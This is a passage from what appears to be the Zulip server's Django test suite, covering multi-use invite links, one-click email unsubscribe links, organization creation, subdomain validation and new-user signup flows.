invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
invite.save()
if streams is not None:
invite.streams.set(streams)
if date_sent is None:
date_sent = timezone_now()
key = generate_key()
Confirmation.objects.create(
content_object=invite,
date_sent=date_sent,
confirmation_key=key,
type=Confirmation.MULTIUSE_INVITE,
)
return confirmation_url(key, self.realm, Confirmation.MULTIUSE_INVITE)
def check_user_able_to_register(self, email: str, invite_link: str) -> None:
password = "password"
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
from django.core.mail import outbox
outbox.pop()
def test_valid_multiuse_link(self) -> None:
email1 = self.nonreg_email("test")
email2 = self.nonreg_email("test1")
email3 = self.nonreg_email("alice")
date_sent = timezone_now() - datetime.timedelta(
days=settings.INVITATION_LINK_VALIDITY_DAYS - 1
)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
self.check_user_able_to_register(email1, invite_link)
self.check_user_able_to_register(email2, invite_link)
self.check_user_able_to_register(email3, invite_link)
def test_expired_multiuse_link(self) -> None:
email = self.nonreg_email("newuser")
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("The confirmation link has expired or been deactivated.", result)
def test_invalid_multiuse_link(self) -> None:
email = self.nonreg_email("newuser")
invite_link = "/join/invalid_key/"
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link is malformed.", result)
def test_invalid_multiuse_link_in_open_realm(self) -> None:
self.realm.invite_required = False
self.realm.save()
email = self.nonreg_email("newuser")
invite_link = "/join/invalid_key/"
with patch("zerver.views.registration.get_realm_from_request", return_value=self.realm):
with patch("zerver.views.registration.get_realm", return_value=self.realm):
self.check_user_able_to_register(email, invite_link)
def test_multiuse_link_with_specified_streams(self) -> None:
name1 = "newuser"
name2 = "bob"
email1 = self.nonreg_email(name1)
email2 = self.nonreg_email(name2)
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email1, invite_link)
self.check_user_subscribed_only_to_streams(name1, streams)
stream_names = ["Rome", "Verona"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email2, invite_link)
self.check_user_subscribed_only_to_streams(name2, streams)
def test_create_multiuse_link_api_call(self) -> None:
self.login("iago")
result = self.client_post("/json/invites/multiuse")
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_with_specified_streams_api_call(self) -> None:
self.login("iago")
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
stream_ids = [stream.id for stream in streams]
result = self.client_post(
"/json/invites/multiuse", {"stream_ids": orjson.dumps(stream_ids).decode()}
)
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.check_user_subscribed_only_to_streams("test", streams)
def test_only_admin_can_create_multiuse_link_api_call(self) -> None:
self.login("iago")
# Only admins should be able to create multiuse invites even if
# invite_to_realm_policy is set to Realm.POLICY_MEMBERS_ONLY.
self.realm.invite_to_realm_policy = Realm.POLICY_MEMBERS_ONLY
self.realm.save()
result = self.client_post("/json/invites/multiuse")
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.login("hamlet")
result = self.client_post("/json/invites/multiuse")
self.assert_json_error(result, "Must be an organization administrator")
def test_multiuse_link_for_inviting_as_owner(self) -> None:
self.login("iago")
result = self.client_post(
"/json/invites/multiuse",
{"invite_as": orjson.dumps(PreregistrationUser.INVITE_AS["REALM_OWNER"]).decode()},
)
self.assert_json_error(result, "Must be an organization owner")
self.login("desdemona")
result = self.client_post(
"/json/invites/multiuse",
{"invite_as": orjson.dumps(PreregistrationUser.INVITE_AS["REALM_OWNER"]).decode()},
)
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_invalid_stream_api_call(self) -> None:
self.login("iago")
result = self.client_post(
"/json/invites/multiuse", {"stream_ids": orjson.dumps([54321]).decode()}
)
self.assert_json_error(result, "Invalid stream id 54321. No invites were sent.")
class EmailUnsubscribeTests(ZulipTestCase):
def test_error_unsubscribe(self) -> None:
# An invalid unsubscribe token "test123" produces an error.
result = self.client_get("/accounts/unsubscribe/missed_messages/test123")
self.assert_in_response("Unknown email unsubscribe request", result)
# An unknown message type "fake" produces an error.
user_profile = self.example_user("hamlet")
unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assert_in_response("Unknown email unsubscribe request", result)
def test_message_notification_emails_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in message notification emails
that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user("hamlet")
user_profile.enable_offline_email_notifications = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile, "missed_messages")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_offline_email_notifications)
def test_welcome_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in welcome e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user("hamlet")
# Simulate a new user signing up, which enqueues 2 welcome e-mails.
enqueue_welcome_emails(user_profile)
self.assertEqual(2, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from the welcome e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The welcome email jobs are no longer scheduled.
self.assertEqual(result.status_code, 200)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_digest_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in digest e-mails that you can
click even when logged out to stop receiving them.
Unsubscribing from these emails also dequeues any digest email jobs that
have been queued.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_digest_emails)
# Enqueue a fake digest email.
context = {
"name": "",
"realm_uri": "",
"unread_pms": [],
"hot_conversations": [],
"new_users": [],
"new_streams": {"plain": []},
"unsubscribe_link": "",
}
send_future_email(
"zerver/emails/digest",
user_profile.realm,
to_user_ids=[user_profile.id],
context=context,
)
self.assertEqual(1, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from digest e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The setting is toggled off, and scheduled jobs have been removed.
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_digest_emails)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_login_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in login
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user("hamlet")
user_profile.enable_login_emails = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile, "login")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_login_emails)
def test_marketing_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in marketing e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_marketing_emails)
# Simulate unsubscribing from marketing e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "marketing")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_marketing_emails)
def test_marketing_unsubscribe_post(self) -> None:
"""
The List-Unsubscribe-Post header lets email clients trigger an
automatic unsubscription request via POST (see RFC 8058), so
test that too.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_marketing_emails)
# Simulate unsubscribing from marketing e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "marketing")
client = Client(enforce_csrf_checks=True)
result = client.post(
urllib.parse.urlparse(unsubscribe_link).path, {"List-Unsubscribe": "One-Click"}
)
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_marketing_emails)
class RealmCreationTest(ZulipTestCase):
@override_settings(OPEN_REALM_CREATION=True)
def check_able_to_create_realm(self, email: str, password: str = "test") -> None:
notification_bot = get_system_bot(settings.NOTIFICATION_BOT)
signups_stream, _ = create_stream_if_needed(notification_bot.realm, "signups")
string_id = "zuliptest"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Check confirmation email has the correct subject and body, extract
# confirmation link and visit it
confirmation_url = self.get_confirmation_url_from_outbox(
email,
email_subject_contains="Create your Zulip organization",
email_body_contains="You have requested a new Zulip organization",
)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertTrue(
result["Location"].startswith("http://zuliptest.testserver/accounts/login/subdomain/")
)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
user = get_user(email, realm)
self.assertEqual(user.realm, realm)
# Check that user is the owner.
self.assertEqual(user.role, UserProfile.ROLE_REALM_OWNER)
# Check defaults
self.assertEqual(realm.org_type, Realm.CORPORATE)
self.assertEqual(realm.emails_restricted_to_domains, False)
self.assertEqual(realm.invite_required, True)
# Check welcome messages
for stream_name, text, message_count in [
(Realm.DEFAULT_NOTIFICATION_STREAM_NAME, "with the topic", 3),
(Realm.INITIAL_PRIVATE_STREAM_NAME, "private stream", 1),
]:
stream = get_stream(stream_name, realm)
recipient = stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by("date_sent")
self.assert_length(messages, message_count)
self.assertIn(text, messages[0].content)
# Check signup messages
recipient = signups_stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by("id")
self.assert_length(messages, 2)
self.assertIn("Signups enabled", messages[0].content)
self.assertIn("signed up", messages[1].content)
self.assertEqual("zuliptest", messages[1].topic_name())
realm_creation_audit_log = RealmAuditLog.objects.get(
realm=realm, event_type=RealmAuditLog.REALM_CREATED
)
self.assertEqual(realm_creation_audit_log.acting_user, user)
self.assertEqual(realm_creation_audit_log.event_time, realm.date_created)
# Piggyback a little check for how we handle
# empty string_ids.
realm.string_id = ""
self.assertEqual(realm.display_subdomain, ".")
def test_create_realm_non_existing_email(self) -> None:
self.check_able_to_create_realm("user1@test.com")
def test_create_realm_existing_email(self) -> None:
self.check_able_to_create_realm("hamlet@zulip.com")
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_create_realm_ldap_email(self) -> None:
self.init_default_ldap_database()
with self.settings(LDAP_EMAIL_ATTR="mail"):
self.check_able_to_create_realm(
"newuser_email@zulip.com", self.ldap_password("newuser_with_email")
)
def test_create_realm_as_system_bot(self) -> None:
result = self.client_post("/new/", {"email": "notification-bot@zulip.com"})
self.assertEqual(result.status_code, 200)
self.assert_in_response("notification-bot@zulip.com is reserved for system bots", result)
def test_create_realm_no_creation_key(self) -> None:
"""
Trying to create a realm without a creation_key should fail when
OPEN_REALM_CREATION is false.
"""
email = "user1@test.com"
with self.settings(OPEN_REALM_CREATION=False):
# Create new realm with the email, but no creation key.
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("New organization creation disabled", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zuliptest.testserver")
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True, FREE_TRIAL_DAYS=30)
def test_create_realm_during_free_trial(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.url, "http://zuliptest.testserver/upgrade/?onboarding=true")
result = self.client_get(result.url, subdomain=string_id)
self.assert_in_success_response(["Not ready to start your trial?"], result)
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_two_realms(self) -> None:
"""
Verify correct behavior and PreregistrationUser handling when using
two pre-generated realm creation links to create two different realms.
"""
password = "test"
first_string_id = "zuliptest"
second_string_id = "zuliptest2"
email = "user1@test.com"
first_realm_name = "Test"
second_realm_name = "Test"
# Make sure the realms do not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(first_string_id)
with self.assertRaises(Realm.DoesNotExist):
get_realm(second_string_id)
# Now we pre-generate two realm creation links
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
first_confirmation_url = self.get_confirmation_url_from_outbox(email)
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 1)
# Get a second realm creation link.
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
second_confirmation_url = self.get_confirmation_url_from_outbox(email)
self.assertNotEqual(first_confirmation_url, second_confirmation_url)
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 2)
# Create and verify the first realm
result = self.client_get(first_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain=first_string_id,
realm_name=first_realm_name,
key=first_confirmation_url.split("/")[-1],
)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(first_string_id)
self.assertEqual(realm.string_id, first_string_id)
self.assertEqual(realm.name, first_realm_name)
# One of the PreregistrationUsers should have been used up:
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 1)
# Create and verify the second realm
result = self.client_get(second_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain=second_string_id,
realm_name=second_realm_name,
key=second_confirmation_url.split("/")[-1],
)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(second_string_id)
self.assertEqual(realm.string_id, second_string_id)
self.assertEqual(realm.name, second_realm_name)
# The remaining PreregistrationUser should have been used up:
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 0)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self) -> None:
result = self.client_post("/new/", {"email": "hi@mailinator.com"})
self.assert_in_response("Please use your real email address.", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
errors = {
"id": "length 3 or greater",
"-id": "cannot start or end with a",
"string-ID": "lowercase letters",
"string_id": "lowercase letters",
"stream": "unavailable",
"streams": "unavailable",
"about": "unavailable",
"abouts": "unavailable",
"zephyr": "unavailable",
}
for string_id, error_msg in errors.items():
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assert_in_response(error_msg, result)
# test valid subdomain
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="a-0", realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://a-0.testserver/accounts/login/subdomain/"))
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_using_old_subdomain_of_a_realm(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name", acting_user=None)
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="zulip", realm_name=realm_name
)
self.assert_in_response("Subdomain unavailable. Please choose a different one.", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="", realm_name=realm_name
)
self.assert_in_response("unavailable", result)
# test valid use of root domain
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="", realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://testserver/accounts/login/subdomain/"))
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain_option(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain="abcdef",
realm_in_root_domain="true",
realm_name=realm_name,
)
self.assert_in_response("unavailable", result)
# test valid use of root domain
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain="abcdef",
realm_in_root_domain="true",
realm_name=realm_name,
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://testserver/accounts/login/subdomain/"))
def test_is_root_domain_available(self) -> None:
self.assertTrue(is_root_domain_available())
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
self.assertFalse(is_root_domain_available())
realm = get_realm("zulip")
realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
realm.save()
self.assertFalse(is_root_domain_available())
def test_subdomain_check_api(self) -> None:
result = self.client_get("/json/realm/subdomain/zulip")
self.assert_in_success_response(
["Subdomain unavailable. Please choose a different one."], result
)
result = self.client_get("/json/realm/subdomain/zu_lip")
self.assert_in_success_response(
["Subdomain can only have lowercase letters, numbers, and '-'s."], result
)
result = self.client_get("/json/realm/subdomain/hufflepuff")
self.assert_in_success_response(["available"], result)
self.assert_not_in_success_response(["unavailable"], result)
def test_subdomain_check_management_command(self) -> None:
# Short names should not work, even with the flag
with self.assertRaises(ValidationError):
check_subdomain_available("aa")
with self.assertRaises(ValidationError):
check_subdomain_available("aa", allow_reserved_subdomain=True)
# Malformed names should never work
with self.assertRaises(ValidationError):
check_subdomain_available("-ba_d-")
with self.assertRaises(ValidationError):
check_subdomain_available("-ba_d-", allow_reserved_subdomain=True)
with patch("zerver.lib.name_restrictions.is_reserved_subdomain", return_value=False):
# Existing realms should never work even if they are not reserved keywords
with self.assertRaises(ValidationError):
check_subdomain_available("zulip")
with self.assertRaises(ValidationError):
check_subdomain_available("zulip", allow_reserved_subdomain=True)
# Reserved ones should only work with the flag
with self.assertRaises(ValidationError):
check_subdomain_available("stream")
check_subdomain_available("stream", allow_reserved_subdomain=True)
class UserSignUpTest(InviteUserBase):
def _assert_redirected_to(self, result: HttpResponse, url: str) -> None:
self.assertEqual(result.status_code, 302)
self.assertEqual(result["LOCATION"], url)
def verify_signup(
self,
*,
email: str = "newguy@zulip.com",
password: Optional[str] = "newpassword",
full_name: str = "New user's name",
realm: Optional[Realm] = None,
subdomain: Optional[str] = None,
) -> UserProfile:
"""Common test function for signup tests. It is a goal to use this
common function for all signup tests to avoid code duplication; doing
so will likely require adding new parameters."""
if realm is None: # nocoverage
realm = get_realm("zulip")
client_kwargs: Dict[str, Any] = {}
if subdomain:
client_kwargs["subdomain"] = subdomain
result = self.client_post("/accounts/home/", {"email": email}, **client_kwargs)
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"], **client_kwargs)
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, **client_kwargs)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS. This should create our
# account, log us in, and redirect to the app.
result = self.submit_reg_form_for_user(
email, password, full_name=full_name, **client_kwargs
)
# Verify that we were served a redirect to the app.
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://lear.testserver/")
# Verify that we successfully logged in.
user_profile = get_user(email, realm)
self.assert_logged_in_user_id(user_profile.id)
return user_profile
def test_bad_email_configuration_for_accounts_home(self) -> None:
"""
Make sure we redirect for EmailNotDeliveredException.
"""
email = self.nonreg_email("newguy")
smtp_mock = patch(
"zerver.views.registration.send_confirm_registration_email",
side_effect=EmailNotDeliveredException,
)
with smtp_mock, self.assertLogs(level="ERROR") as m:
result = self.client_post("/accounts/home/", {"email": email})
self._assert_redirected_to(result, "/config-error/smtp")
self.assertEqual(m.output, ["ERROR:root:Error in accounts_home"])
def test_bad_email_configuration_for_create_realm(self) -> None:
"""
Make sure we redirect for EmailNotDeliveredException.
"""
email = self.nonreg_email("newguy")
smtp_mock = patch(
"zerver.views.registration.send_confirm_registration_email",
side_effect=EmailNotDeliveredException,
)
with smtp_mock, self.assertLogs(level="ERROR") as m:
result = self.client_post("/new/", {"email": email})
self._assert_redirected_to(result, "/config-error/smtp")
self.assertEqual(m.output, ["ERROR:root:Error in create_realm"])
def test_user_default_language_and_timezone(self) -> None:
"""
Check if the default language of new user is the default language
of the realm.
"""
email = self.nonreg_email("newguy")
password = "newpassword"
timezone = "US/Mountain"
realm = get_realm("zulip")
do_set_realm_property(realm, "default_language", "de", acting_user=None)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, timezone=timezone)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user("newguy")
self.assertEqual(user_profile.default_language, realm.default_language)
self.assertEqual(user_profile.timezone, timezone)
from django.core.mail import outbox
outbox.pop()
def test_default_twenty_four_hour_time(self) -> None:
"""
Check if the default twenty_four_hour_time setting of new user
is the default twenty_four_hour_time of the realm.
"""
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
do_set_realm_property(realm, "default_twenty_four_hour_time", True, acting_user=None)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user("newguy")
self.assertEqual(user_profile.twenty_four_hour_time, realm.default_twenty_four_hour_time)
def test_signup_already_active(self) -> None:
"""
Check if signing up with an active email redirects to a login page.
"""
email = self.example_email("hamlet")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertIn("login", result["Location"])
result = self.client_get(result.url)
self.assert_in_response("You've already registered", result)
def test_signup_system_bot(self) -> None:
email = "notification-bot@zulip.com"
result = self.client_post("/accounts/home/", {"email": email}, subdomain="lear")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result["Location"])
result = self.client_get(result.url)
# This is not really the right error message, but at least it's an error.
self.assert_in_response("You've already registered", result)
def test_signup_existing_email(self) -> None:
"""
Check if signing up with an email used in another realm succeeds.
"""
email = self.example_email("hamlet")
self.verify_signup(email=email, realm=get_realm("lear"), subdomain="lear")
self.assertEqual(UserProfile.objects.filter(delivery_email=email).count(), 2)
def test_signup_invalid_name(self) -> None:
"""
Check if an invalid name during signup is handled properly.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
self.assert_in_success_response(["Invalid characters in name!"], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(["id_password", "id_full_name"], result)
def test_signup_without_password(self) -> None:
"""
Check if signing up without a password works properly when
password_auth_enabled is False.
"""
email = self.nonreg_email("newuser")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with patch("zerver.views.registration.password_auth_enabled", return_value=False):
result = self.client_post(
"/accounts/register/",
{"full_name": "New User", "key": find_key_by_email(email), "terms": True},
)
# User should now be logged in.
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user("newuser")
self.assert_logged_in_user_id(user_profile.id)
def test_signup_without_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": find_key_by_email(email),
"terms": True,
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(["id_password", "id_full_name"], result)
def test_signup_email_message_contains_org_header(self) -> None:
email = "newguy@zulip.com"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
from django.core.mail import outbox
self.assertEqual(outbox[0].extra_headers["List-Id"], "Zulip Dev <zulip.testserver>")
def test_signup_with_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
